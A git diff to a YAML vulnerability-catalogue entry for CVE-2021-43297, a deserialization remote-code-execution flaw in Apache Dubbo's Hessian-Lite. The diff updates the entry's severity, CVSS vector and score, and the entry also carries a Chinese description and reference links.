1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml index 84eb42aa..1ba752b3 100644 --- a/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml +++ b/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml @@ -2,7 +2,7 @@ id: CVE-2021-43297 source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 info: name: Dubbo是一个高性能优秀的服务框架。 - severity: high + severity: CRITICAL description: | Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。 scope-of-influence: @@ -11,8 +11,8 @@ info: - https://help.aliyun.com/document_detail/390193.html - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.9 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-43297 cwe-id: CWE-502 cnvd-id: None -- Gitee